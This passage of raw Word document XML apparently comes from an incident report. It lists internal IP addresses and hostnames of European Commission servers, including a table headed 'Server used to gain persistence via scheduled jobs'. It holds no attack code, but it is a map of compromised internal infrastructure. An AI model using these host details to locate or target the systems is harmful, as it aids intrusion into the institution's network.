            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7CCDAA9F" w14:textId="4F57D29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6B7B3AEA" w14:textId="184727C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23AA974C" w14:textId="3C2996A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UR.COMMONSERVICES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="081D40CB" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7B9167DC" w14:textId="6E73ADA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10.130.179.234</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43708F5E" w14:textId="4418841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wlstd04205.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1842DD85" w14:textId="7735E4B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402271B2" w14:textId="791791D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15FCC40D" w14:textId="45D9A9F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UR.COMMONSERVICES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="524F995A" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="022612B1" w14:textId="66DB011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10.130.130.43</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="193A4C3E" w14:textId="144A518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wlstd03378.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="19FEC625" w14:textId="6994D4E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6B596A3E" w14:textId="5838E6E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56C97DD8" w14:textId="2E4FCD7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5F25B1AA" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="05648B95" w14:textId="7AC5CC8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10.130.176.73</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6677E91F" w14:textId="09A7CCB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wlstd03096.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="64891F05" w14:textId="0DB80B8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22C2582F" w14:textId="5E0442F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164631F3" w14:textId="324EA98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06DE841E" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5457EAEE" w14:textId="114577C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10.130.137.206</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4059173C" w14:textId="7D4B7F1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wlstd03051.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="42AECFCE" w14:textId="689E94E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4E2DA417" w14:textId="7B77EC3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7AB6237C" w14:textId="09287F7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28ACE67A" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="655B522E" w14:textId="31118BA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10.130.141.198</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2482F2F9" w14:textId="4BDC815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wlstd04182.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5066B4CC" w14:textId="26C251F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4D39F86D" w14:textId="4766DE30"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53C86B36" w14:textId="63D9055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771B9EA4" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0E3255BA" w14:textId="0928390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10.130.141.60</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41BE006F" w14:textId="7B6C8B8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wlstd03379.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="2D3D997C" w14:textId="07CFE6A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436F6147" w14:textId="0F32DC6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446E5D5F" w14:textId="12505A4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5B242D85" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="36235635" w14:textId="6720787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10.130.139.168</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54BEED93" w14:textId="3C0F685C"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wlstd04183.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="41662501" w14:textId="4DD0275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B65895B" w14:textId="2F35E385"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18740A0F" w14:textId="37F7ECFF"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302E7316" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="48870034" w14:textId="63BA4C8A"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10.130.176.251</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CD2BB9E" w14:textId="04AEFF5B"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wlstd03094.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3C964F70" w14:textId="45817DC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7F342BC" w14:textId="06A68057"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5C9BE289" w14:textId="1E2A0A6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3C7FEFDF" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1EBA6EB6" w14:textId="7D1725C4"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10.130.132.192</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40DC2514" w14:textId="7E1FA2E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wlstd03052.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="57F15A93" w14:textId="13C256D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1A4FEE76" w14:textId="6D72609D"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4F99EA7D" w14:textId="77DC09F1"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="405D26B0" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="407CC621" w14:textId="7C10D60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10.130.139.85</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A6AA0DE" w14:textId="7136057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wlstd03446.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="06A37CFE" w14:textId="2189538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38B0F0E7" w14:textId="612C96D6"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19D7CDB5" w14:textId="0F424D1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EUCR.SD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="5ACE60BA" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0CC2E485" w14:textId="2CEF8DE8"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10.130.141.112</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75643431" w14:textId="0DC9AB72"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wlstd03448.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="717D958B" w14:textId="2C559C49"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3C0BE531" w14:textId="48FEC94E"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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="062BDE8C" w14:textId="5EC4D283" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="009C7798">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>EUCR.SD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64971EE0" w14:textId="77777777" w:rsidR="002415FB" w:rsidRPr="001019D3" w:rsidRDefault="002415FB" w:rsidP="002415FB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="231" w:name="_Ref208407833"/>
      <w:bookmarkStart w:id="232" w:name="_Toc212654680"/>
      <w:bookmarkStart w:id="233" w:name="_Toc198044939"/>
      <w:bookmarkStart w:id="234" w:name="_Ref198132290"/>
      <w:bookmarkStart w:id="235" w:name="_Ref198132293"/>
      <w:bookmarkStart w:id="236" w:name="_Toc209809069"/>
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6927BC1B" w14:textId="03FA3957" w:rsidR="002415FB" w:rsidRPr="001019D3" w:rsidRDefault="002415FB" w:rsidP="002415FB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="237" w:name="_Toc198044938"/>
      <w:bookmarkStart w:id="238" w:name="_Ref198127376"/>
      <w:bookmarkStart w:id="239" w:name="_Ref198129876"/>
      <w:bookmarkStart w:id="240" w:name="_Toc209809068"/>
      <w:bookmarkStart w:id="241" w:name="_Ref212817397"/>
      <w:bookmarkStart w:id="242" w:name="_Toc213253583"/>
      <w:bookmarkEnd w:id="231"/>
      <w:bookmarkEnd w:id="232"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Server used </w:t>
      </w:r>
      <w:r w:rsidR="00F5296D" w:rsidRPr="001019D3">
        <w:t>to gain</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> persistence via scheduled job</w:t>
      </w:r>
      <w:bookmarkEnd w:id="237"/>
      <w:bookmarkEnd w:id="238"/>
      <w:bookmarkEnd w:id="239"/>
      <w:bookmarkEnd w:id="240"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
      <w:bookmarkEnd w:id="241"/>
      <w:bookmarkEnd w:id="242"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1516"/>
        <w:gridCol w:w="2315"/>
        <w:gridCol w:w="850"/>
        <w:gridCol w:w="1511"/>
        <w:gridCol w:w="2554"/>
      </w:tblGrid>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="14D105D2" w14:textId="003D9EFE" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="753E3DB7" w14:textId="49E483B7" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1323" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34685012" w14:textId="4B215C99" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>FQDN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="486" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="711FD697" w14:textId="2E7DFEDA" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>DG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="864" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DC53506" w14:textId="32A6BDFF" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1460" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1024D67C" w14:textId="41D3C072" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Hosted Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="1D49EFB4" w14:textId="14CD255A" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7D6BE4D1" w14:textId="323C8319" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.180.214</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1323" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="31D9162B" w14:textId="40A5720E" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd04187.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="486" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3B2353F5" w14:textId="26155C67"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3E4CF9ED" w14:textId="1C86A2AD"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vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="26B88A95" w14:textId="741B96B8" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>URA.EXTRACTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="4D807FBE" w14:textId="39CF5588" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4B0B559D" w14:textId="6883B3B9" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.140.150</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1323" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="387D802B" w14:textId="5B065829" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd04188.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="486" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="45AEC0DE" w14:textId="1D710D11"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2E50D8CF" w14:textId="150EF56F"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vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="465D1D95" w14:textId="79EA55E6" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>URA.EXTRACTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="3BEF6928" w14:textId="41ACBA24" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="148DC60E" w14:textId="1BE01FF2" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.130.139</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1323" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="55B16BBF" w14:textId="3E05C1FF" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd02910.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="486" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4D7CF0C1" w14:textId="7DF03005"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31A270F6" w14:textId="026F3CFC"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vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4F74220B" w14:textId="00834B1E" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>UR.COMMONSERVICES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="107D163C" w14:textId="030B6C81" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="2C907DBC" w14:textId="22340B25" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
